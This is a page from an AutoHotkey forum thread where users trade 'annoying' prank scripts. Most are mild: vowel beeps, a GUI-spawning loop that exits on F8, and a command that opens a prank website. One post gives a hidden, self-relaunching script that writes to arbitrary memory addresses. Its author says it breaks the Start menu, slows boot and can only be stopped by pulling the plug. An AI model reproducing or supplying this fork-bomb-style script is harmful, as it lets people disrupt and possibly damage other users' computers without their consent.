AutoHotkey Community

It is currently May 27th, 2012, 10:21 am

All times are UTC [ DST ]




Post new topic Reply to topic  [ 141 posts ]  Go to page Previous  1 ... 6, 7, 8, 9, 10
Author Message
 Post subject:
PostPosted: December 11th, 2011, 12:38 am 
Offline

Joined: June 3rd, 2008, 7:34 pm
Posts: 86
Location: Italy
ip0t wrote:
you r a bad person. you should learn to forgive others. revenge is for weak people. you are weak.


Nah, i'm not a religious one :D

_________________
All my scripts/snippets are released under the WTFPL: http://sam.zoy.org/wtfpl/COPYING


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: December 27th, 2011, 4:20 am 
Offline

Joined: October 2nd, 2011, 7:29 pm
Posts: 11
lilljimpa wrote:
could not some1 make something like this http://www.youtube.com/watch?v=sYiZKLPj2Fo&NR=1

that is total enjoining

It would only work if the speaker had a pitch setting, but yes, it is possible with settimers or selfruns, but it would be very, very hard.


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: December 27th, 2011, 9:01 am 
Offline

Joined: April 19th, 2011, 4:55 am
Posts: 298
friendly...
Code:
a::soundbeep, 3000,500
e::soundbeep, 4000,600
i::soundbeep, 5400,700
o::soundbeep, 3000,800
u::soundbeep, 6000,900

good luck with your vowel typing goals of 2012!


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: December 28th, 2011, 7:15 pm 
Offline

Joined: December 2nd, 2011, 4:41 pm
Posts: 57
Here's the worst code from this topic

Code:
run nobrain.dk


Its very annoying! XD

_________________
http://www.autohotkey.net/~iBob35555VR << help me creating better graphics! :P post suggestions in "Leave a comment". Thanks


Report this post
Top
 Profile  
Reply with quote  
 Post subject: Annoying Scripts
PostPosted: January 14th, 2012, 3:44 am 
Offline

Joined: October 2nd, 2011, 7:29 pm
Posts: 11
I made a script that borks start menu, causes errors, and tacks on a lot to boot time if it goes for a long time. Did I mention the only way to shut down is pulling the plug? (or doing a restart/hard shutdown but I'm working on borking that too)
Code:
#NoTrayIcon
SetFormat, IntegerFast, hex
Loop {
Addr :=  A_LoopIndex
Addr += 0
Addr .= ""
WEEE := NumPut(914653, %Addr%+0)
Run %A_ScriptFullPath%
}


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: January 14th, 2012, 5:54 am 
Offline
User avatar

Joined: December 5th, 2010, 7:19 pm
Posts: 311
Code:
Loop
{
Loop, 99
{
   Gui, %a_index%:Destroy
   Gui, %a_index%:Show, % "w300 h200 x" . Rnd(0,A_ScreenWidth) . " y" . Rnd(0,A_ScreenHeight)
}
}
Return

F8::ExitApp

Rnd(x,y)
{
Random, Result, x, y
Return Result
}


This one spawns a bunch of gui's and moves them about your screen.
I threw in F8 just incase you wanted to stop the guispam

_________________
Image


Report this post
Top
 Profile  
Reply with quote  
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 141 posts ]  Go to page Previous  1 ... 6, 7, 8, 9, 10

All times are UTC [ DST ]


Who is online

Users browsing this forum: XX0 and 26 guests


You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Powered by phpBB® Forum Software © phpBB Group